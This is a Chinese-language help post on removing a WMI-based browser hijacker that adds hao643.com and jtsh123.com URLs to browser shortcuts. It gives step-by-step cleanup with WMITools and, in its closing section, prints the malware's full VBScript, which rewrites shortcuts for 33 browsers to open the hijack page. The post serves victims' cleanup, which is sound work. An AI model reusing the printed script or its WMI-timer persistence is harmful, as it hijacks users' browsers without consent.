WMITools修复wmi劫持--hao643.com/jtsh123劫持(修改快捷方式跳转至hao123.com)
>症状:
所有浏览器快捷方式,都被加上尾巴,例如IE的:"C:\Program Files\Internet Explorer\iexplore.exe" http://hao643.com/?r=ggggg&m=c104
手工去掉尾巴后,每隔一定时间(网友说是30分钟)后,尾巴重新被加上。
PS:这病毒仅修改快捷方式,应该没有其它病毒特征。
>解决方案:
1.安装WMITools(点击下载)
2.管理员身份打开 C:\Program Files (x86)\WMI Tools\wbemEventViewer.exe
3.点击左上角第一个按钮 “Register for Events”(钢笔形状)
4. 弹出WMI Event Registration Editor新窗口,在弹出的“连接命名空间”里,输入root\CIMV2
我的是默认已经输入这个了,如果没有就需要自己创建,方法是:
自己创建Namespace的方法:
“命名空间”里,就是 root\CIMV2 了。
5. 点“OK”按钮,在login 界面也直接点“OK” 按钮。 (自己创建“命名空间”的可以跳过这一步哟)
6. 在第1个下拉菜单有3个选择项:Consumers、Filters、Timers
在右侧选中后右击——>选择view instant properties
查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://hk.jtsh123.com/?r=b&m=10” 或 "http://hao643.com/?r=ggggg&m=e2"
我们要做的是,将上方属性中的Script相关的项目下的所有VBScript内容全部删除
当然,也可以直接将“WMI Event Registration Editor”窗口的第一个下拉菜单(有3个Consumers、Filters、Timers选择项的)左侧下方的所有实例全部删除(右键菜单,Delete instance)
7.去掉所有浏览器快捷方式的尾巴--涉及所有的浏览器快捷方式:
最后还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的“http://hk.jtsh123.com/?r=b&m=10” 或 “http://hao643.com/?r=ggggg&m=e2” 去掉!
114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe
8. 完成Done.
>附 病毒脚本
1 On Error Resume Next:Const link = "http://hao643.com/?r=ggggg&m=c104":Const link360 = "http://hao643.com/?r=ggggg&m=c104&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\ChenShao\Desktop,C:\Users\ChenShao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\ChenShao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\ChenShao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\ChenShao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next: